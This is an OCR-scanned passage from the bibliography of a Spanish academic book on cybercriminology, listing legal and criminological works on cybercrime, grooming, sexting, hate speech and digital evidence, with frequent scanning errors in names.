del cibercrim n y mejores prácticas en seguridad digital (Cybercriminology
Guidefor th lnvestigation of cybercrime and best practices in digital security).
Universid d Antonio Nariño, Bogotá.
CHor, K.S., L E, S.S. & LEE, J.R. (2017). "Mobile Phone Technology and Online
Sexual Harassment among Juveniles in South Korea: Effects of Self-control
and Social Learning", International Journal of Cyber Criminology, 11( 1),
pp. 110-127.
CLJMENT DURAN, C., GARRIDO GENOVÉS, V. & GuARDJOLA GARCIA, J. (2012). El informe
criminológico forense: teoría y práctica. Tirant Lo Blanch, Valencia.
CLOUGH, J. (2015). Principies of Cybercrimen, 2ª ed. Cambridge University Press,
CoLAs TUREGANO, A. (2016). "El delito de intrusismo informático tras la reforma del Cp
español de 2015" Revista Boliviana de Derecho Nº 21, Enero 2016.
CoMEs RAGA, l. (2013) . "La protección penal de la intimidad a través de la difusión
inconsentida de sexting ajeno", La Ley penal, 105, edición digital.
CUARESMA MORALES, D. (2010). "El informe criminológico en el contexto penitenciario",
Revista de Derecho Penal y Criminología, 3ª Época, 3, pp. 339-351.
CuGAT MAuru, M. (2014). "La tutela penal de los menores ante el online grooming: entre
la necesidad y el exceso", La Ley Penal, 107, edición digital.
DANQUAH, P., & LoNGE, O. (2011). "An empirical test of the space transition theory of
cyber criminality: Investigating cybercrime causation factors in Ghana",
African Journal of Computing & ICT, 2( 1), pp. 37-48.
DE LA CUESTA ARZAMENDI, J. L. & PÉREZ MACHJo, A. l. (2010) . "Cíberdelincuentes y
cibervfctimas", en J.L DE LA CUESTA ARZAMENDI (dir.), N. DE LA MATA (coord.).Derecho
Penal Informático Civitas, Madrid.
DE LA MArA BARRANCO, N. (2015). Derecho penal europeo y legislación española: las
reformas del código penal. Valencia, Tirant lo Blanch.
DE LA MATA BARRANCO, N. (2018). "Delitos contra la propiedad intelectual e industrial
y violación de secretos de empresa", en N. DE LA MATA BARRANCO, J. Dop¡co GóMEz-
ALLER, J.A. LAscuRAfN SANCHEZ Y A. NIETO MARTlN Derecho penal económico y de la
empresa. Madrid, Dykinson, pp. 327-366.
DE LA MATA BARRANCO, N. HERNANDEZ DíAZ, L. (2009). "El delito de daños informáticos:
una tipificación defectuosa", en Estudios penales y criminológicos, n. 29.
DE LEMUSVARA, F.J. (2015). "El delito de child grooming tras la modificación operada en
el artículo 183 ter del Código Penal, por la Ley Orgánica 1/2015", La Ley, 5175,
edición digital.

- 352 -
Bibliogrqfra

DE PABLO SERRANO, L. & TAPIA BALLESTEROS, P. (2017). "Discurso del odio: problemas en
la delimitación del bien jurídico y en la nueva configuración del tipo penal",
Diario La Ley, 8911, edición digital.
DE URBANO CASTRJLLO, E. (2004). "La prueba pericial videográfica", La Ley Penal, 4,
edición digital.
DE URBANO CASTRJLLO, E. (2008). "La Prueba Electrónica", La Ley Penal, 46, edición
digital.
DE URBANO CASTRJLLO, E. (2009). La valoración de la prueba electrónica. Tirant Lo
Blanch, Valencia.
DEL Río, J. SADABA, C. & BRINGUÉ, X. (2010). "Menores y redes ¿sociales? De la amistad al
cyberbullying", Revista de Estudios de Juventud, 88, edición digital.
DELGADO MARTIN, J. (2013). "La prueba electrónica en el proceso penal", Diario La Ley,
816 7, edición digital.
DELGADO MARTIN, J. (2016). Investigación tecnológica y prueba digital en todas las
jurisdicciones. Wolters Kluwer, Madrid, 2016.
DELGADO MARTIN, J. (2017). "La prueba digital. Concepto, clases, aportación al proceso y
valoración", Diario La Ley, 6, 11 de abril de 2017, edición digital.
DIAZ CoRTÉS, L.M. (2014). "Sentencia de la Sección Primera de la Audiencia Provincial
de Sevilla, de 3 de octubre (ROJ SAP SE 3018/2013) y Sentencia del Juzgado
de Menores n. 2 1 de Ourense, de 13 de mayo (ROJ SJME OU 43/2013).
Pronunciamientos sobre el delito denominado child grooming", Ars Iuris
Salmanticensis, 2, pp. 303-374.
D1Ez-P1cAzo, L. M. y NIETO MARTIN, A. (dirs.) (2010). Los Derechos Fundamentales en el
Derecho Penal Europeo. Aranzadi, Cizur Menor (Navarra).
D1N1s, M. & ALMEIDA, S. (2017). "Las comunicaciones comerciales no solicitadas
por correo electrónico (spam) y la prueba (electrónica) del "opting out":
breve estudio comparativo de los regímenes portugués y español", Revista
iberoamericana de Derecho informático, 2, pp. 6 7-78.
Do1z LAGO, M.J. (2011). "Los delitos de pederastia", La Ley, 15055, edición digital.
Do1z LAGO, M.J.(2011). "Un acercamiento al nuevo delito de child grooming. Entre los
delitos de pederastia", Diario La Ley, 7575, edición digital.
D012 LAGO, M.J. (2016). "Child grooming y sexting: anglaicismos, sexo y menores en el
Código Penal tras la reforma de 2015", Diario La Ley, 8758, edición digital.
D012 LAGO, J.M. (2018). "La infancia como bien jurídico colectivo protegido
penalmente", La Ley, 3330, edición digital.
Do1z LAGO, M.J. (Dir.) & FrGUEROA NAVARRO, M.C. (Coord.) et al. (2012). La prueba pericial
científica. Edisofer, Madrid.
ÉCIJA BERNAL, Á. (2017 1 ) . "Principales conductas antisociales de Internet. Análisis y
propuestas de solución (I)", Diario La Ley, 3, Sección Ciberderecho, edición
digital y también Diario La Ley, 8956.

- 353 -
Bibliografla

ÉCIJA BERNAL, Á.(2017 2 ). "Principales conductas antisociales de Internet (Il)", Diario La


Ley, 3, Sección Ciberderecho, edición digital.
ÉCIJA BERNAL, Á. (2017 ) . "Principales conductas antisociales de Internet (y III)", Diario
La Ley, 4, Sección Ciberderecho, edición digital.
FAJARDO, M.I., GORDILLO M., & REGALADO, A.B. (2013 ). "Sexting: Nuevos usos de la tecnología
y la sexualidad en adolescentes", International Journal of Developmental and
Educational Psychology, 1(1), pp. 521-534.
FANJUL FERNANDEZ, M.L. et al (2018). Conceptualización, evolución y clasificación
del ciberdelito empresarial. Definición del ciberdelincuente. Implicaciones
estratégicas. AMEC Ediciones, Madrid.
FERNÁNDEZ Nrnro, J. (2016) . "Reforma del Código Penal: hacia una nueva dimensión
de la protección de la víctima en los delitos de sexting y grooming", La Ley,
863/2016, edición digital.
FERNANDEZ RODERA, J. A. (2015) . "La lucha contra el delito en la Red", Cuadernos de la
Guardia Civil, 51, pp. 112- 123.
FERNANDEZ RODRÍGUEZ, Á. P. (2019). "Algunas consideraciones a partir de la regulación
del registro de dispositivos de almacenamiento masivo de la información",
Diario La Ley, 9433, 11 de Junio de 2019, edición digital.
FINKELHOR, D. (2008). Childhood Victimization. Violence, Crime, and Abuse in the Lives of
Young People. Oxford University Press, Oxford (USA).
FLORES MENDOZA, F. (2012). "Nuevas formas de criminalidad patrimonial a través de
Internet", Revista Penal, 29, pp. 77 y ss.
FLORES PRADA, I. (2015). "Prevención y solución de conflictos internacionales de
jurisdicción en materia de ciberdelincuencia", Revista Electrónica de Ciencia
Penal y Criminología 17(21). Disponible en: http://criminet.ugr.es/recpc/l 7 /
recpcl7-21.pdf
FRANCA, L.A. (2018) . "Cyber-Criminologies", en CARLEN, P. & FRANCA, L.A. (Eds .).
Alternative Criminologies. Routledge, Abington, Oxford.
FuRNELL S.M. (2001). The Problem of Categorising Cybercrime and Cybercriminals,
en 2nd Australian Information Warfare and Security Conference, Perth,
Australia.
FussEY, P. & MURRAY, D. (2019). Independent Report on the London Metropolitan Po/ice
Service 's Tria/ of Live Facial Recognition Technology. The Human Rights,
Big Data and Technology Project - Economic & Social Research Council.
Disponible en: https:// 48ba3m4eh2bf2sksp43rq8kk-wpengine. netdna -ssl.com/
wp-content/ uploads/ 2019 / 07/London-Met-Police-Trial-of-Facial-Recognition-
Tech-Report.pdf
GALÁN MUÑoz, A. (2006). "Ataques contra sistemas informáticos", en Boletín del
Ministerio de Justicia, Año 60, Nº Extra 2015.

- 354 -
Bibliografla

GARClA GUILABERT, N. (2016). ''Actividades cotidianas de los jóvenes en Internet y


victimización por malware", en Ciberdelincuencia y cibervictimización, Revista
d'Internet, Dret i Política, núm. 22 junio, pp. 59-72.
GARCÍA RivAs, N. (2019). "Un giro represivo en la protección de los derechos de autor
en Internet", en Ciberdelitos (2ª ed.), Marcelo A. Riquert (coord.) . Buenos Aires,
Hammurabi.
GARCíA-PABLOS DE MoLINA, A. (2016). Criminología. Una introducción a sus fundamentos
teóricos (8ª ed .), Tirant lo Blanch, Valencia.
GARRIDO GENOVÉS, V. & BELLOCH ALBIÑANA, C. (2017). Tratado de criminología forense. Vol.
I. La criminología forense y el informe criminológico. Tirant lo Blanch, Valencia.
GARRIDO GENOVÉS, V. (2001). Amores que matan. Acoso y violencia contra las mujeres.
Alzira, Algar.
GARROCHO SALCEDO, A. (2015). "Delito de incitación al odio, hostilidad, discriminación o
violencia", en Molina Fernández, F. (Dir.). Memento Práctico Penal 2016. Francis
Lefebvre, Madrid.
GAscóN CuENCA,A. ( 2015 ). "La nueva regulación del discurso del odio en el ordenamiento
jurídico español: la modificación del artículo 510 CP", Cuadernos Electrónicos
de Filosofía del Derecho, 32, edición digital.
GERMAN MANCEBO, l. (2013). "El informe criminológico: Su interés y alcance en el ámbito
judicial", International e-Journal of Criminal Science, 7(2), edición digital.
GIL GIL, A., MARTlN FERNANoEz, C. (2009). "Sobre la tipicidad de la conducta de colgar en
la red una obra protegida con ánimo comercial y la atipicidad de su descarga
a pesar de su ilicitud. A la vez una propuesta técnica y jurídica de solución a
la violación de derechos de propiedad intelectual a través de las redes p2p",
Indret: Revista para el Análisis del Derecho, NQ. 2
GIL RuBio, J. (2008). "Pederastia virtual", Diario La Ley, 6961, edición digital.
GóMEZ MARTÍN, V. (2012). "Discurso del odio y principio del hecho", en Mm Pmc, S.
& CoRCOY BmAsoLO, M. (Dir.). Protección penal de la libertad de expresión e
información. Una interpretación constitucional. Tirant lo Blanch, Valencia.
GóMEZ MARTÍN, V. (2016). "Incitación al odio y género. Algunas reflexiones sobre el
nuevo art. 510 CP y su aplicabilidad al discurso sexista'; Revista Electrónica
de Ciencia Penal y Criminología , 18-20, disponible en http://criminet.ugr.es/
recpc/18/recpc18-20.pdf
GoNZALEZ CoLLANTES, T. (2015). "Los delitos contra la intimidad tras la reforma de 2015:
luces y sombras", en Revista de Derecho Penal y Criminología, 3. ª Época, n.º 13
GoNZALEZ GARCÍA, A. (2016). "Cibercriminología, el futuro está aquí", en Bruces, D., RAMILA,
J., & PÉREZ SuAREz, J.R. (Dirs.). La Criminología de hoy y del mañana. Dykinson,
Madrid.
GoNzALEZ Rus, J. J. (2002). "Naturaleza y ámbito de aplicación del delito de daños en
elementos informáticos (artículo 264.2 del Código Penal)", en DlEz RIPOLLÉS, J.

- 355 -
Bibliografta

L., La Ciencia del Derecho penal ante el nuevo siglo: Libro homenaje al profesor
doctor don José Cerezo Mir, Madrid, Tecnos.
GoNZALEZ Rus, J.J. ( 1999). "Protección penal de sistemas, elementos, datos, documentos
y programas informáticos", en Revista Electrónica de Ciencia Penal y
Criminología, Nº. 1, 1999.
GONZÁLEZ-CABRERA, J., CALVETE, E., LEóN-ME]1A, A., PÉREZ-SANCHO, C., & PEINADO, J. M.
(2017). "Relationship between cyberbullying roles, cortisol secretion and
psychological stress", Computers in Human Behavior, vol. 70, pp.153-160.
GoRDON, S. & FoRo, R. (2006). "On the Definition and classification of Cybercrime",
Journal ofComputer Virology. 2.
GóRRJz Rovo, E. (2016). "On-line child grooming en Derecho penal español. El delito
de preparación on-line de menores con fines sexuales, del art. 183 ter.1 º CP
(conforme a la LO 1/2015, 30 de Marzo)", InDret, 3/2016, edición digital.
GRABOSKY, (2000). CyberCrimeAndinformation Warfare.http:/ /www.combattingcybercrime.
org/fües /virtual-li brary / phenomena-challeng es-cybercrime / cyber-crime-and-
information-warfare.pdf (último acceso 15.07.2019)
GUTIÉRREZ FRANCÉS, M. (1994). «Intrusismo informático (hacking). ¿Represión penal
autónoma?, Informática y Derecho, nº 12-15.
GuTJÉRREZ JIMtNEZ, M.E. (2018). "Satire as a radical practice of freedom of expression.
The case ofthe "puppeteers" on TVE news and in ABC texts", Observatory OBS
Journal, 12( 1), pp. 85-109.
HAFNER, K. & MARKOFF, J. (1995). Cyberpunks: Outlaws and Hackers on the Computer
Frontier. Touchstone, Simon & Schuster, New York.
HARAWAY, D. (1991). Simians, cyborgs and women: The reinvention of nature. Free
Association, London.
HEREDIA MARTlNEz, F. (2008). "Valoración psiquiátrico forense del pederasta", La Ley
Penal, 55, edición digital.
HERRERA MORENO, M. (2001). "El fraude informático en el derecho penal español",
Actualidad Penal, Ref. XXXIX, Tomo 3, edición digital.
H!GGINS, G.E. (2007). "Digital piracy, self-control theory, and rational choice: An
examination of the role of values", International Journal of Cyber Criminology,
1(1), pp. 33-55.
Hlccrns, G.E ., & MAK1N, D.A. (2004). "Self-Control, Deviant Peers, and Software Piracy",
Psychological Reports, 95, pp. 921-931.
HlNDUJA, S. & PATCHJN, J.W. (2007). "Offline consequences of online victimization: School
violence and delinquency", Journal of School Violence, 6(3), pp. 89-112.
HoLT, T. J. (2007). "Subcultura! Evolution? Examining the Influence ofün-and Off-Line
Experiences on Deviant Subcultures", Deviant Behavior, 28, pp. 171-198.
INTERNET WORLD STATS (2019). Internet World Stats. Usage and Population Statistics.
Recuperado de: https://www.internetworldstats.com/stats.htm

- 356 -
Bibliografta

IRWIN, J. D. Wu Ch.-H. (2016). Introduction to Computer Networks and Cybersecurity.


CRC Press.
JAHANKHANT, H. (Ed.) (2018). Cyber Criminology.: Springer International Publishing,
Springer Nature Switzerland.
JAISHANKAR K. (2008). "Space transition theory of cyber crimes", en ScHMALLAGER, F. &
PITTARO, M. (Eds.). Crimes of the Internet. Prentice, Hall Upper Saddle River, pp.
283-301.
JAISHANKAR, K. (2007a). "Cyber criminology: Evolving a novel discipline with a new
journal", International Journal of Cyber Criminology, 1 ( 1), pp. 1-6.
JAISHANKAR, K. (2007b). "Establishing a theory of cyber crimes". International Journal of
Cyber Criminology, 1(2), pp. 7-9.
JAISHANKAR, K. (2010). "The Future of Cyber Criminology: Challenges and
Opportunities", International Journal of Cyber Criminology, 4(1&2), pp. 26-31.
JAISHANKAR, K. (2011) . "Introduction", en JAISHANKAR, K. (Ed.). Cyber criminology:
Exploring Internet crimes and criminal behaviour. CRC Press, Boca Raton
(Florida), pp. xxvii-xxxv.
JAISHANKAR, K. (2018). "Cyber Criminology as an Academic Discipline: History,
Contribution and Impact", International Journal of Cyber Criminology, 12(1),
p. 1-8.
JUNGER M., MoNTOYA, L., HARTEL P. & HEYDARI, M. (2017). "Towards the normalization
of cybercrime victimization. A routine activities analysis of cybercrime in
Europe", 2017 International Conference on Cyber Situational Awareness,
Data Analytics and Assessment (Cyber SA), London, pp. 1-8. doi: 10.1109 /
CyberSA.2017.8073391
KAUR, Prit (2014). "Sexting or pedophilia?", Revista Criminalidad, 56 (2), pp. 263-272.
KIGERL, A. (2016). "Cyber Crime Nation Typologies: K-Means Clustering of Countries
Based on Cyber Crime Rates", International Journal of Cyber Criminology,
10(2), pp. 147-169.
KooPs, B.J. (2010). "The internet and its opportunities far cybercrime", Transnational
Criminology Manual, 1, pp. 735-754.
LAMARCA PÉREZ, C. (2017). "Delitos contra el orden público", en ALONSO DE EscAMILLA,
A., LAMARCA PÉREZ, c., RomúGUEZ NÚÑEZ, A. & MEsTRE DELGADO, E. Delitos. La parte
especial del Derecho penal. Dykinson, Madrid.
LANDA GoROSTIZA, J.M. (1999). "Incitación al odio: evolución jurisprudencial (1995-
2011) del art. 510 CP y propuesta "lege lata"", Revista de Derecho Penal y
Criminología, 7, pp. 297-346.
LANDA GoROSTIZA, J.M. (1999). La intervención penal frente a la xenofobia. Problemática
general con especial referencia al "delito de provocación" del a,·tículo 510 del
Código Penal. Universidad del País Vasco, Zarautz.

- 357 -
Bibliografia

LARRAURI Pm¡AN, E. (2012). "La necesidad de un informe social para la decisión y ejecución
de las penas comunitarias", Boletín Criminológico, 139(7), edición digital.
LARRAURI, E. & ZoRRILA, N. (2014). "Informe social y supervisión efectiva en la
comunidad: especial referencia a delitos de violencia de género ocasional",
InDret, 3, edición digital.
LASCURÁIN SANCHEZ, J.A. (2010). "La libertad de expresión tenía un precio. (Sobre la STC
235/2007, de inconstitucionalidad del delito de negación del genocidio)",
Revista Aranzadi Doctrinal, 6, 2010, edición digital.
LEssrG, L. (2006) . Code: Version 2.0. 2nd Ed. Basic Books, New York.
LEUKFELDT, R. (Ed.) (2017). Research agenda the human factor in cybercrime and
cybersecurity. Eleven International Publishing, The Hague (Netherlands).
LEZERTúA, M. (2002). «El Proyecto de Convenio sobre el caber crimen del Consejo de
Europa», en Internet y Derecho penal, Cuadernos de Derecho Judicial, Consejo
General del Poder Judicial, Madrid,
LLORENTE VEGA, M. J. (2011) . "Informática forense", en ÜTERO J.M. (Ed.). Policía Científica:
Cien Años al Servicio de la Justicia. Ministerio del Interior, Madrid.
LLORIA GARC1A, P. (2013). "Delitos y redes sociales: los nuevos atentados a la intimidad,
el honor y la integridad moral. Especial referencia al «sexting»", La Ley penal,
105, edición digital.
LóPEZ ORTEGA, J.J. (2004). «Intimidad informática y Derecho penal», Derecho a la
intimidad y nuevas tecnologías, Cuadernos de Derecho Judicial, Consejo
General del Poder Judicial, Madrid,
LUENGO LATORRE, J.A. (2011). Ciberbulling. Guía de recursos para centros educativos. La
intervención en los centros educativos: Materiales para Equipos Directivos y
acción tutoría!. Defensor del Menor de la Comunidad de Madrid.
MAcKENZIE, R., McEWAN, T., PATHÉ, M., JAMES, D., ÜGLOFF, J., & MULLEN, P. (2009). Stalking
risk pro.file: Guidelines f ar the assessment and management of stalkers. Centre
for Forensic Behavioural Science, Monash University-Stalkinc, Victoria
(Australia).
MAGRO SERVET, V. (2006). "La prueba pericial informática. La utilización de los medios
de prueba informáticos en el proceso penal", La Ley Penal, 33, edición digital.
MAGRO SERVET, V. (2010). "El "grooming" o ciber acoso infantil, el nuevo artículo 183 bis
del Código Penal", Diario La Ley, 7492, edición digital.
MAGRO SERVET, V (2014). "El delito de sexting o difusión de imágenes tomadas con
consentimiento de la víctima en la violencia de género en la reforma del código
penal (Análisis del nuevo delito de «sexting» o difusión de imágenes en la nueva
redacción del art. 197.4 bis en la reforma del Código penal que persigue sancionar
la difusión de imágenes que ha obtenido el autor del delito con anuencia de la
victima, pero que luego las difunde menoscabando gravemente la intimidad de la
victima. Su relevancia en la violencia de género).", La Ley, 7190, edición digital.

- 358 -
Bibliografia

MAGRO SERVET, V. (2017). "La tipificación penal de la suplantación de identidad en el


uso de las redes sociales", Diario La Ley, 9005, edición digital.
MAPLE, C., SHORT, E. & BRowN, A. ET AL. (2011). Cyberstalking in the United Kingdom. An
Analysis of the ECHO Pilot Survey. University of Bedfordshire, National Centre
for Cyberstalking Research.
MART!NEZ FRANc1sco, N. (2018). "Victimization in cyberspace: additional suffering from
crime", texto inédito facilitado por la autora.
MARTlNEZ OTERO, J.M. (2013). "La difusión de sexting sin consentimiento del
protagonista: un análisis jurídico", Derecom, 12, pp. 1-15.
MATA Y MARTlN, R. M. (2012) . El proceso penal en la sociedad de la información. Las
nuevas tecnologías para investigar y probar el delito. La Ley, Madrid.
MATTHEWS, R.(2014). Realist Criminology, Palgrave Macmillan,UK.
McCANN, J.T. (1998). "Subtypes of stalking (obsessional following) in adolescents",
Journal of Adolescence, 21, pp. 66 7-6 7 5.
McCANN, J.T. (2000). "A descriptive study of child and adolescent obsessional
followers", Journal of Forensic Sciences, 45, pp. 195-199.
McCANN, J.T.(2001). Stalking in chíldren and adolescents: The primitive bond. American
Psychological Association. Washington.
McCANN, J.T. (2002). "The phenomenon of stalking in children and adolescents"
en BooN, J.C.W. & SHERIDAN, L. (Eds.): Stalking and psychosexual obsession:
Psychological perspectives far prevention, policing and treatment. Wiley,
Chichester.
MELENDO PARDOS M., CALLEJO GALLEGO M. & LACRUZ LóPEZ, J. M. (2019). Apuntes de Política
Criminal, Dykinson, Madrid.
MELOY, J.R. ( 1999). "Stalking: An old behavior, a new crime", Psychiatric Clinics of North
America, 22, pp. 85-99.
MELDY, J.R. (2007). "Stalking: the state of the Science", Criminal Behaviour and Mental
Health, 17, edición digital.
MÉNDEZ REBOLLAL, A. (2007). "Delitos contra la propiedad intelectual relativos a los
programas de ordenador. Aspectos Prácticos", La Ley Penal, 34, edición digital.
MERCADO CoNTRERAS, C.T., PEDRAZA CABRERA, F.J. & MARTiNEZ MARTlNEZ, K.l. (2016). "Sexting:
su definición, factores de riesgo y consecuencias", Revista sobre la infancia y la
adolescencia, 10, pp. 1-18.
MEsTRE DELGADO, E. (2010). "La reforma (piccola y pícara) de los delitos contra la
propiedad intelectual", Diario La Ley, 7534, edición digital.
MEsTRE DELGADO, E. (2015). "La cadena de custodia de los elementos probatorios
obtenidos de dispositivos informáticos y electrónicos", en Figueroa Navarro,
M.C. (Dir.): La cadena de custodia en el proceso penal. Edisofer, Madrid.

- 359 -
Bibliografía

MESTRE DELGADO, E. (2017). "Delitos contra la propiedad intelectual", en ALONSO DE


EscAMILLA, A., LAMARCA PÉREZ, C., RonR1GUEZ NÚÑEZ, A. & MEsrRE DELGADO, E.: Delitos.
La parte especial del Derecho penal. Dykinson, Madrid.
MILLER L. C. (2014). Cybersecurity for dummies. Willey. https://d3alc7xa4w7z55.
cloudfront.net/static/upload/protected/201/0114/2015-osspaloaltol-
cybersecurity-for-dummies.pdf (último acceso 15.07.2019)
MIRA BENAVENr,J. (2016 ). "Algunas consideraciones político-criminales sobre la función
de los delitos de enaltecimiento del terrorismo y humillación a las víctimas
del terrorismo", en PORTILLA CoNrRERAs, G. & PÉREZ CEPEDA, A.I. (Dirs.): Terrorismo
y contraterrorismo en el Siglo XXI. Un análisis penal y político criminal. Ratio
Legis, Salamanca.
M!Ró LUNARES, F. (2007). "El futuro de la propiedad intelectual desde su pasado. La
historia de los derechos de autor y su porvenir ante la revolución de Internet",
Revista de la Facultad de Ciencias Sociales y Jurídicas de Elche 1(2) marzo, pp.
103-155.
M!Ró LLINARES, F. (2012). El cibercrimen. Fenomenología y criminología de la
delincuencia en el ciberespacio. Marcial Pons, Madrid.
MIRó LUNARES, F. (2013). "Derecho penal, cyberbullying y otras formas de acoso (no
sexual) en el ciberespacio", IDP Revista de Internet, Derecho y Política, 16, pp. 61-
75.
M!Ró LUNARES, F. (2015). "Delitos contra bienes inmateriales, corrupción y receptación.
Análisis y consideraciones críticas ante la nueva Reforma penal", en Estudios
sobre el Código Penal reformado (Leyes Orgánicas 1/2015 y 2/2015), L. Morillas
Cuevas (dir.) Madrid, Dykinson.
M!Ró LLINARES, F. (2016). "Taxonomía de la comunicación violenta y el discurso del
odio en Internet", IDP Revista de Internet, Derecho y Política, 22, pp. 93-118.
M!Ró LLJNARES, F. (2019). "Inteligencia artificial y justicia penal: más allá de
los resultados lesivos causados por robots", Revista de Derecho Penal y
Criminología, 3ª Época, n 2 20, pp. 87-130.
MoNTIEL, l. & AGUSTINA, J. (2018). "Victimización sexual de menores a través de las TIC",
en Cibercrimen II. Daniela Dupuy (dir.), Mariana Kiefer (coord.). B de F, Buenos
Aires, pp. 405-439.
MooRE, R. (2006) . Cybercrime: Investigating High-Technology Computer Crime,
Cincinnati, Ohio: Anderson Publishing.
MoRALES PRATS, F. (2016). Comentarios al Código penal español, t. 1, (7ª ed.). Thomson
Reuters Aranzadi, Pamplona.
MoRóN LERMA, E. ( 1999 ). Internet y Derecho Penal: Hacking y otras conductas ilícitas en
la Red. Aranzadi, Cizur Menor (Navarra).
MUÑoz MACHADO, S. (2000). La regulación de la red: Poder y derecho en Internet. Madrid,
Taurus.

- 360 -
l
Bibliografta

1
No SoMos DELITO (2014). La reforma del Código penal: Un grave retroceso en los
derechos y las libertades públicas, disponible en: https://nosomosdelito.net/
si tes/ default/files /public_files / ... / estudio_com pleto_cp.pdf
NoRTON-SYMANTEC. (2016) . Norton Cyber Security Insights Report, disponible en https://
us.norton.com/ cyber-security-insights-2016
NoRTON LIFELOCK CYBER SAFETY INSIGHTS REPoRT (2018). Cyber Safety Insights Report Global
Results. The Harris Poll. Disponible en: https://now.symassets.com/content/
dam/norton/campaign/NortonReport/2019 /20 lB_N orton_LifeLock_Cyber_
Safety_Insights_Rep ort_Global_Media_Deck.pdf
OuvA LEóN, R. (2016) . "La prueba electrónica envenenada", en OLIVA LEóN, Ricardo &
VALERO BARCELó, S. (Coords.). La prueba electrónica. Validez y eficacia procesal.
Juristas con Futuro, Zaragoza.
ÜLIVERIO FERRARIS, A. GRAzrnsr B., (2004). ¿Qué es la pedo.filia? Barcelona. Paidós Ibérica.
ORTEGA BALANZA,MARTA &RAMíREZ ROMERO, Luis (2015). "Matones enla red: cyberbullying.
Tratamiento legal y respuesta jurisprudencia!", Diario La Ley, 8485, edición
digital.
PALOMO DEL ARco, A. (2011). Delitos contra la propiedad intelectual: investigación a
través de las nuevas tecnologías. La Ley, Madrid.
PANIZO GALANDE, V. (2011). "El ciber-acoso con intención sexual y el child-grooming",
Quadernos de Criminología, 15, pp. 22-31.
PARDO ALBIACH, J. (2010). "Ciber-acoso: cyberbullying, grooming, redes sociales y otros
peligros", en GARCÍA GoNZALEZ, J. (Dir.): Ciberacoso: la tutela penal de la intimidad,
la integridad y la libertad sexual en Internet. Tirant lo Blanch, Valencia.
PATHÉ, M., PURCELL, R., & STUART, G.W. ( 1999). "Study of stalkers", American Journal of
Psychiatry, 156, pp. 1244-1249.
PAYA SANTOS, C., CREMADES GUISADO, A., & DELGADO MORAN, J.J. (2017). "El fenómeno de la
ciberdelincuencia en España: La propuesta de la Universidad de Nebrija en la
capacitación de personal para la prevención y el tratamiento del ciberdelito",
Revista policía y seguridad pública, Año VII, Vol. 1, pp. 237-270.
PÉREZ DtAz, R. (2017). "El fenómemo sexting entre menores", La Ley, 10974, edición
digital.
PÉREZ FERRER, F. (2012). "El nuevo delito de ciberacoso o child grooming en el Código
Penal español (artículo 183 bis)", Diario La Ley, 7915, edición digital.
PÉREZ G1L, J. (2003). "Medidas de investigación y de aseguramiento de la prueba en el
«Convenio sobre el Cibercrimen»", Actualidad Penal, 36, Semana del 29 Sep. al
5 Oct. 2003, Ref. XXXV, p. 895, Tomo 3.
PÉREZ SuAREZ, J.R. (2015) . We are Cyborgs: Developing a Theoretical Model far
Understanding Criminal Behaviour on the Internet. Doctoral thesis, University
of Huddersfield.

- 361 -
Bibliografta

PÉREZ SuAREz, J. R (2016 ). "Cyborgs del espacio/tiempo", en BRIGGS, D., RAMILA, J., & PÉREZ SuAREz,
J.R (Dirs.). La Criminología de hoy y del mañana. Dykinson,Madrid, pp. 129-154.
PORTAL MANRUBIA, J. (2013). "La regulación de la prueba electrónica en el proceso
penal", Revista Derecho y Proceso Penal, 31, pp. 19-41.
PORTAL MANRUBIA, J. (2019). "La incorporación de los dispositivos de almacenamiento
masivo en el procedimiento penal", Revista Aranzadi Doctrinal, 2, edición digital.
PORTILLA CoNTRERAS, G. (2015). "La represión penal del discurso del odio", en QUINTERO
OLIVARES, G. (Dir.): Comentario a la reforma penal de 2015. Aranzadi, Pamplona.
PRIETO MONTES, J. L. (2012). "Guía práctica para la elaboración del diagnóstico clínico
criminológico", Archivos de Criminología, Criminalística y Seguridad Privada,
IX,pp. 1-16.
PUENTE RODRÍGUEZ, L. (2017) . "El nuevo delito de autoadoctrinamiento terrorista",
Diario La Ley, 8967, edición digital.
PuRCELL, P., PATHÉ, M., & MULLEN, P.E. (2001). ''A study of women who stalk", American
Journal of Psychiatry, 158, pp. 2056-2060.
PURCELL, P., PATHÉ, M., & MULLEN, P.E. (2000) . Stalkers and their victims. Cambridge
University Press, London.
QUINTERO OLIVARES, G. (2017). "La robótica ante el Derecho penal: el vacío de respuesta
jurídica a las desviaciones incontroladas", Revista Electrónica de Estudios Penales
y de la Seguridad, núm. 1-II. https://www.ejc-reeps.com/Gonzalo%20Quintero%20
La%20robotica%20ante%20el%20Derecho%20penal%20REEPS.pdf
RAMos VAZQUEZ, J.A. (2009). "La declaración de inconstitucionalidad del delito de
"negacionismo" (artículo 607.2 del Código Penal)", Revista penal, 23, pp. 120-
137.
RAMos VAZQUEZ, J.A. (2011). "El nuevo delito de ciberacoso de menores a la luz del
derecho comparado", Diario La Ley, 7746, edición digital.
RAvóN BALLESTEROS, M.C. & GóMEz HERNANDEZ, J. A. (2014). "Cibercrimen: particularidades
en su investigación y enjuiciamiento", Anuario Jurídico y Económico
Escurialense, XLVII. pp. 209-234.
REEP-VAN DEN BERGH, C., M. M. & JUNGER, M.(2018). "Victims of cybercrime in Europe:
a review of victim surveys", Crime Science 7 (5). https://doi.org/10.1186/
s40163-018-00 79-3
REY HurDOBRO, L.F. (2012). "La estafa informática: relevancia penal del phising y el
pharming", Diario La Ley, 7926, edición digital.
Rrco BAUTISTA, D. & RUEDA RUEDA, J. S. (2016). "La informática forense en dispositivos
Android", INGENIO UFPSO, Vol. 09, pp. 21-34.
RODRIGO TORRES, V. (2009). "El informe criminológico como herramienta de apoyo a la
investigación criminalística", Revista de estudios policiales, 5, 121-131.
RODRÍGUEZ FERNANDEZ, M.P. (2012). "Suplantación electrónica de identidad. Posible
respuesta jurídica penal", Diario La Ley, 7906, edición digital.

- 362 -
Bi bliografla

RoGERS, M. (1999). "The Psychology of Hackers: The Need for a New Taxonomy",
disponible en www.dvara.net/HK/hacker_doc.pdf (último acceso 15.07.2019)
RoGERS, M.K. (2006). "A Two-Dímensional Circumplex Approach to the Development
of a Hacker Taxonomy", Digital Investigation, 3(2), pp. 97-102.
Rorn ToRREs, M. (2015). "Los delitos de racismo y discriminación (arts. 510, 510 bis,
511 y 512)", en VV.AA.: Comentarios a la reforma del Código penal de 2015.
Tirant lo Blanch, Valencia.
RoMEo CASABONA, C. M. ( 1988). Poder informático y seguridad jurídica: la función tutelar
del derecho penal ante las nuevas tecnologías de la información Fundesco, D.L.
Madrid.
RoMEo CASABONA, C. M. (2013). "Política penal de la Unión Europea sobre los
